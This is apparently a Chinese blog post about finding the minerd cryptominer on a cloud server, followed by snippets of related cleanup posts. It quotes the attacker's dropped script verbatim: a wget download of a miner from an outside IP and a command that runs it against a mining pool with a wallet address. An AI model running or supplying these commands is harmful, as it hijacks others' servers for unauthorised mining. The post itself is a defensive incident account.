服务器被挖矿minerd

原创 2015年11月20日 16:41:36

用的阿里云服务器,这两天报警,load值高,

看了下管理控制台,近期流量也耗了不少钱

top 看了下 有个进程耗cpu居高不下,

进程:/tmp/minerd

百度了下,原来是个挖矿程序

如果top看不到的话,ps查看每一个进程名,也可以发现端倪

不知道是暴力破解密码还是通过其他漏洞植入的

在/tmp目录下放了一个sh文件

文件内容:

wget http://211.79.60.17/project/cpuminer/pooler-cpuminer-2.4.2-linux-x86_64.tar.gz
tar -xzf pooler-cpuminer-2.4.2-linux-x86_64.tar.gz
setsid /tmp/minerd -a scrypt  -o 31.41.40.25:9327 -u LNZyZEbAfZDGwb3Cca13qjbcKJ2JfqTTkk:1 &

杀掉进程后查看了下定时任务 crontab -l   ,定时任务没有做手脚

目前先修改了登陆密码,后续再观察

【网络安全】我的第一次windows服务器杀毒经历

公司的数据库服务器上有毒,一直没太在意(因为没有人在意,创业公司,问题不严重就没人管)。 今天遇到点问题,就顺手把服务器上的毒清了吧。 快捷键win+ R,打开cmd 输入netstat -an...
  • u014542626
  • u014542626
  • 2016年09月21日 14:34
  • 4497

Linux清除木马minerd

minerd是什么今天突然发现cup使用率一直都很高,高达100%,查看后发现多了minerd这个进程,将其kill掉后,过一会还是存在 步骤: 1.删除定时任务的内容 crontab -e ...
  • juan083
  • juan083
  • 2016年08月02日 15:28
  • 2706

一个利用“永恒之蓝”漏洞传播的挖矿程序分析

* 本文作者:渔村安全,本文属FreeBuf原创奖励计划,未经许可禁止转载 背景介绍 近日,渔村安全团队追踪到一个利用永恒之蓝漏洞传播的挖矿程序,其具备高度的模块化和较强的传播能力,在短短数日...
  • qq_27446553
  • qq_27446553
  • 2017年08月28日 05:33
  • 1024

关于服务被挖矿程序minerd入侵解决方法

今天一早过来,运维同事发现服务器的负载有点异常,打开top一看,发现有个进程一直占用很高的cpu 在opt目录下发现有个异常文件,是个命令文件minerd 在确定跟项目不相关的情况下判断是个木...
  • Hu_wen
  • Hu_wen
  • 2016年07月14日 14:31
  • 28877

阿里云服务器被挖矿程序minerd入侵的终极解决办法

突然发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了200%多的CPU, 百度了一下,查到几篇文章都有人遇到同样问题,解决的办法:http://blog.csdn.net...
  • tjcyjd
  • tjcyjd
  • 2017年01月06日 17:35
  • 23771

linux中了minerd之后完全清理过程

一不小心装了一个redis服务,开了一个全网的默认端口,一开始以为这台服务器没有公网ip,结果发现之后悔之莫及啊 某天发现cpu load高的出奇,发现一个minerd进程 占了大量cpu,goo...
  • qiushi888
  • qiushi888
  • 2016年08月08日 15:58
  • 2596

Linux minerd木马清除(续)

前两天清除了minerd木马之后,服务器一直运行良好。本来以为就这样解决问题了。结果,今天晚上,突然收到监控组的告警,说服务器再度变慢,不但cpu 100%了,就是连带宽也100%了。我晕,于是SSH...
  • oarsman
  • oarsman
  • 2016年07月17日 21:22
  • 3037

今天你的服务器被"挖矿"了吗?

前几天我朋友给我反馈他的网站打开特别慢,我起初以为他网站访问人数多了并发高了、或者带宽不足、或者代码写质量问题、再或者SQL查询响应慢,或者 Redis “门”开着没关。我立马上服务器看了 top 了...
  • kingstart01
  • kingstart01
  • 2017年06月21日 15:05
  • 3450

记一次苦逼的服务器被挖矿的清除过程

环境说明 Centos 6.2 现象描述       通过top查看服务器资源,cpu资源几乎被占尽,但是top list里面却没有显示出是哪个进程占用的资源 而且系统...
  • bobpen
  • bobpen
  • 2017年02月21日 13:15
  • 5385

服务器被入侵(minerd挖矿程序)

记录一次服务器被入侵的解决方法 一:问题说明 1、我的服务器是使用的阿里云的CentOS,收到的阿里云发来的提示邮件如下 然后我查看了运行的进程情况(top 命令),看到一个名为minerd...
  • u013082989
  • u013082989
  • 2016年07月20日 18:54
  • 21307
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:服务器被挖矿minerd
举报原因:
原因补充:

(最多只允许输入30个字)